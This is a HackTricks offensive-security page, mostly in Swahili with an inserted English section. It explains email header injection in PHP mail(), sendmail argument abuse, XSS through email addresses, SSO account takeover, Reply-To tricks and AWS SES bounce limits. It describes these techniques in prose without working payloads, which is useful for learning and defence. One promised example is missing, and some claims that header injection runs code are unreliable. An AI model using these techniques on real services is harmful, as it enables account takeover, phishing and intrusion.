Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia taratibu za kiotomatiki** zinazotumia zana za jamii za **kisasa zaidi** duniani.\
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
The PHP `mail()` function is commonly used to send emails from a web application. However, if not properly secured, it can be vulnerable to email injection attacks. In an email injection attack, an attacker can manipulate the email headers to inject malicious content or even execute arbitrary code on the server.
To exploit this vulnerability, an attacker needs to identify a web application that uses the `mail()` function and does not properly sanitize user input. The attacker can then craft a malicious payload that includes special characters such as newline characters, semicolons, and double quotes.
The payload can be injected into the email headers, specifically the `To`, `Subject`, and `Additional Headers` parameters. By manipulating these parameters, the attacker can control the recipient of the email, the subject line, and even add additional headers that can be used to execute arbitrary code.
For example, an attacker can inject a newline character followed by a `CC` header to send a copy of the email to a different recipient. The payload may look like this:
When the `mail()` function is called with these parameters, the email will be sent to both the victim and the attacker.
To prevent email injection attacks, it is important to properly sanitize user input before using it in the `mail()` function. This can be done by validating and filtering user input to ensure that it does not contain any special characters that can be used for injection.
Additionally, it is recommended to use a secure email library or framework that handles email sending securely and automatically sanitizes user input. This can help mitigate the risk of email injection vulnerabilities.
By understanding and exploiting the vulnerabilities in the PHP `mail()` function, an attacker can gain unauthorized access to sensitive information, manipulate email content, and potentially execute arbitrary code on the server. It is crucial for developers to be aware of these vulnerabilities and implement proper security measures to protect against email injection attacks.
Kipengele hiki kitafungwa kwenye mstari wa amri PHP itakayotumia kuamsha sendmail. Hata hivyo, itasafishwa na kazi `escapeshellcmd($additional_parameters)`.
Kiolesura cha **sendmail** kinatolewa na programu ya barua pepe ya MTA (Sendmail, Postfix, Exim n.k.) iliyosakinishwa kwenye mfumo. Ingawa **kazi msingi** (kama vile vigezo vya -t -i -f) inabaki **sawa** kwa sababu za utangamano, **kazi na vigezo vingine** hutofautiana sana kulingana na MTA iliyosakinishwa.
Kulingana na **asili ya sendmail** binary, chaguo tofauti zimegunduliwa kwa ajili ya kudhuru na **kuvuja faili au hata kutekeleza amri za kiholela**. Angalia jinsi ya kufanya hivyo katika [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
Baadhi ya huduma kama **github** au **salesforce inaruhusu** kuunda anwani ya barua pepe na mizigo ya XSS ndani yake. Ikiwa unaweza **kutumia watoa huduma hawa kuingia kwenye huduma zingine** na huduma hizi **hazisafishi** barua pepe kwa usahihi, unaweza kusababisha **XSS**.
Ikiwa **huduma ya SSO** inakuruhusu **kuunda akaunti bila kuthibitisha anwani ya barua pepe iliyotolewa** (kama **salesforce**) na kisha unaweza kutumia akaunti hiyo kuingia kwenye huduma nyingine ambayo **inatumaini** salesforce, unaweza kupata akaunti yoyote.\
Tafadhali kumbuka kuwa salesforce inaonyesha ikiwa barua pepe iliyotolewa imehakikiwa au la, lakini programu inapaswa kuzingatia habari hii.
Unaweza kutuma barua pepe ukitumia _**Kutoka: kampuni.com**_ na _**Jibu-Kwa: mshambuliaji.com**_ na ikiwa **majibu ya moja kwa moja** yanasababishwa na barua pepe kutumwa **kutoka** kwa **anwani ya ndani**, **mshambuliaji** anaweza **kupokea** majibu hayo.
Huduma fulani, kama AWS, inatekeleza kizingiti kinachojulikana kama **Kiwango cha Kukataliwa kwa Kasi**, kawaida kikiwekwa kwa 10%. Hii ni takwimu muhimu, hasa kwa huduma za utoaji wa barua pepe. Wakati kiwango hiki kinapozidiwa, huduma kama huduma ya barua pepe ya AWS inaweza kusimamishwa au kuzuiliwa.
**Kukataliwa kwa Kasi** kunahusu **barua pepe** ambayo imerudishwa kwa mtumaji kwa sababu anwani ya mpokeaji ni batili au haipo. Hii inaweza kutokea kwa sababu mbalimbali, kama vile barua pepe kutumwa kwa anwani isiyopo, kikoa ambacho sio halisi, au kukataa kwa seva ya mpokeaji kukubali barua pepe.
Katika muktadha wa AWS, ikiwa unatuma barua pepe 1000 na 100 kati yao zinasababisha kukataliwa kwa kasi (kwa sababu kama anwani batili au kikoa), hii inamaanisha kiwango cha kukataliwa kwa kasi cha 10%. Kufikia au kuzidi kiwango hiki kunaweza kusababisha AWS SES (Huduma Rahisi ya Barua pepe) kuzuia au kusimamisha uwezo wako wa kutuma barua pepe.
Ni muhimu kuweka kiwango cha kukataliwa kwa kasi kuwa chini ili kuhakikisha huduma ya barua pepe isiyosumbuliwa na kudumisha sifa ya mtumaji. Kufuatilia na kusimamia ubora wa anwani za barua pepe kwenye orodha yako ya barua pepe kunaweza kusaidia sana kufanikisha hili.
Kwa habari zaidi, unaweza kurejelea nyaraka rasmi za AWS kuhusu kushughulikia kukataliwa na malalamiko katika [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
